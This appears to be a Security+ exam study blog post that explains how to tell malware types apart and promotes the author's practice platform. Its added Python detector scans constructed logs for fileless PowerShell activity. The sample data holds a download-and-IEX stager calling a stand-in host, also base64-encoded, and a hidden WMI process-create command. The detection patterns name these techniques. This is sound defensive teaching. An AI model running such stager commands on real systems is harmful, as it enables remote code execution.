The malware section of SY0-701 looks like pure memorization. Learn the words, match them to definitions, move on. Then you sit the exam and a question describes a scenario with no labels on it, and you have to name what happened. That is where people drop points they thought they had locked down.
The fix is to stop memorizing definitions and start hunting for the one detail in each scenario that separates one type from another. Here is how I sort the ones that get confused most.
Virus vs worm
This is the classic trap. Both self-replicate, so people treat them as interchangeable. They are not.
A virus needs two things: a host file to attach to, and a user to run that file. Open the infected document, launch the program, and it spreads. No user action, no spread.
A worm needs neither. It moves across the network on its own, exploiting a vulnerability to jump from machine to machine with nobody clicking anything.
So when a question says the infection spread to every host on the subnet overnight and no user reported opening a file, it is handing you the answer. Nobody clicked, so it is a worm. If the scenario hinges on a user opening an attachment, you are looking at a virus. The give-away is almost always whether a human action was required.
Trojan vs RAT
A trojan is malware disguised as something the user wants. The user installs it on purpose, believing it is a legitimate tool or game. The disguise is the whole point.
A RAT, or remote access trojan, is a specific kind of trojan that hands an attacker ongoing remote control of the machine. Every RAT is a trojan. Not every trojan is a RAT. If the scenario stresses that the attacker now has hands-on-keyboard access to the box, that extra detail is pointing you at RAT rather than a generic trojan.
Fileless malware
This one catches people because it breaks the mental model of malware being a file you can scan. Fileless malware runs in memory and abuses tools that are already on the system, like PowerShell or Windows Management Instrumentation. There is often nothing sitting on disk for antivirus to flag. Fileless does not mean invisible, though: the PowerShell command line, the script block it ran, or the WMI subscription it used to persist is still recorded, so the evidence moves from the file system to process and script logging.
The tell in a question is language about no file being written to disk, legitimate system tools being used, or the code living only in memory. When you see that, stop reaching for a signature-based answer and think fileless.
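To make the fileless tells concrete, here is an added example (not code from the original post) that scans constructed process-creation records for the signals the paragraph names: an encoded PowerShell command, a hidden window, download-and-execute in memory, and process creation through WMI. The log format (host, parent image, command line separated by tabs), the indicator list, and the verdict rule are assumptions made for the example, not a complete detection set; the sample records are constructed, not real telemetry.

```python
"""Flag fileless-style PowerShell/WMI command lines in constructed log records.

Added example for this page. Record format, indicators and scoring are
illustrative assumptions, not a production signature set.
"""
import base64
import re
from typing import Optional

# Weak and strong indicators. Case-insensitive because PowerShell is.
INDICATORS = [
    ("in-memory-exec",  re.compile(r"DownloadString|DownloadData|Invoke-Expression|\bIEX\b", re.I)),
    ("reflective-load", re.compile(r"Reflection\.Assembly\]::Load", re.I)),
    ("wmi-exec",        re.compile(r"Invoke-WmiMethod|Invoke-CimMethod|\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("hidden-window",   re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I)),
    ("no-profile",      re.compile(r"-NoP(?:rofile)?\b", re.I)),
    ("policy-bypass",   re.compile(r"-E(?:x|xecutionPolicy|p)\s+(?:Bypass|Unrestricted)", re.I)),
    ("script-on-disk",  re.compile(r"-F(?:ile)?\s+\S+\.ps1", re.I)),  # the opposite tell: a file on disk
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-E(?:c|nc|ncodedCommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Parents that should not normally be spawning PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Any one of these alone is enough to call the line suspect.
STRONG = {"in-memory-exec", "reflective-load", "wmi-exec", "encoded-command"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand is base64 over UTF-16LE; return the decoded script or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(record: str) -> dict:
    """Return the indicators hit by one 'host<TAB>parent<TAB>cmdline' record and a verdict."""
    host, parent, cmdline = record.split("\t", 2)
    labels = set()
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if ENCODED_RE.search(cmdline):
        labels.add("encoded-command")
    if decoded is not None:
        text = cmdline + " " + decoded  # scan the decoded payload too, not just the wrapper
    for label, rx in INDICATORS:
        if rx.search(text):
            labels.add(label)
    if parent.lower() in OFFICE_PARENTS:
        labels.add("office-parent")
    return {
        "host": host,
        "labels": sorted(labels),
        "decoded": decoded,
        "fileless_suspect": bool(labels & STRONG),
    }


# Constructed sample records (assumed format, not real logs). The stager string is
# encoded here exactly the way PowerShell expects so the decode path is exercised.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "ws01\texplorer.exe\tpowershell.exe -NoProfile -Command Get-Service -Name Spooler",
    f"ws02\twinword.exe\tpowershell.exe -NoP -W Hidden -Enc {ENCODED}",
    "srv03\tservices.exe\tpowershell.exe -c \"Invoke-WmiMethod -Class Win32_Process -Name Create "
    "-ArgumentList 'powershell -w hidden -c whoami'\"",
    "ws04\texplorer.exe\tpowershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for rec in SAMPLE_LOG:
        r = classify(rec)
        print(r["host"], "SUSPECT" if r["fileless_suspect"] else "ok", r["labels"])
        if r["decoded"]:
            print("    decoded:", r["decoded"])
```

Note what the verdict keys on: the second and third records never write a script to disk, and the thing that gives them away is the command line itself (an encoded blob that decodes to a download-and-IEX stager, and a WMI process-create call). The fourth record runs with ExecutionPolicy Bypass but points at a .ps1 on disk, which is exactly the file-based case the scenario language rules out.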
Logic bomb
A logic bomb is code that sits quietly until a condition is met, then fires. The condition can be a date, a specific event, or the absence of something, the classic case being a bomb that goes off when its author's name no longer appears in the payroll records because they have been terminated. The keyword to watch for is a trigger. If the malicious action waits for a time or an event, that is your logic bomb.
Ransomware vs a wiper
Both make data unavailable, and that surface similarity is the trap. Ransomware encrypts data and offers to sell you the key, so the motive is money. A wiper destroys data with no intention of giving it back, so the motive is disruption or sabotage. If the scenario mentions a ransom note or a payment demand, it is ransomware. If data is simply gone and nobody is asking for anything, think wiper, even when it first looks like ransomware that failed.
How to actually practice this
Reading definitions will not build the reflex you need on exam day. Scenario questions will. When you review, cover the answer, read the scenario, and force yourself to name the single detail that made the call: user action or not, disguise or remote control, file on disk or in memory, trigger or ransom. If you cannot point to that detail, you do not understand the question yet. You just recognize the vocabulary.
I built a study platform around this kind of practice while I was working through Security+ myself. It has 1,069 practice questions, 31 reading lessons, hands-on labs and PBQs, and acronym flashcards, all mapped to SY0-701. There is a free diagnostic exam at https://secplusmastery.com/diagnostic if you want to find out which domains are actually weak before you spend another night reviewing the ones you already know cold.
The malware objectives are not hard. They are written to reward people who read carefully. Train the reading, not the list.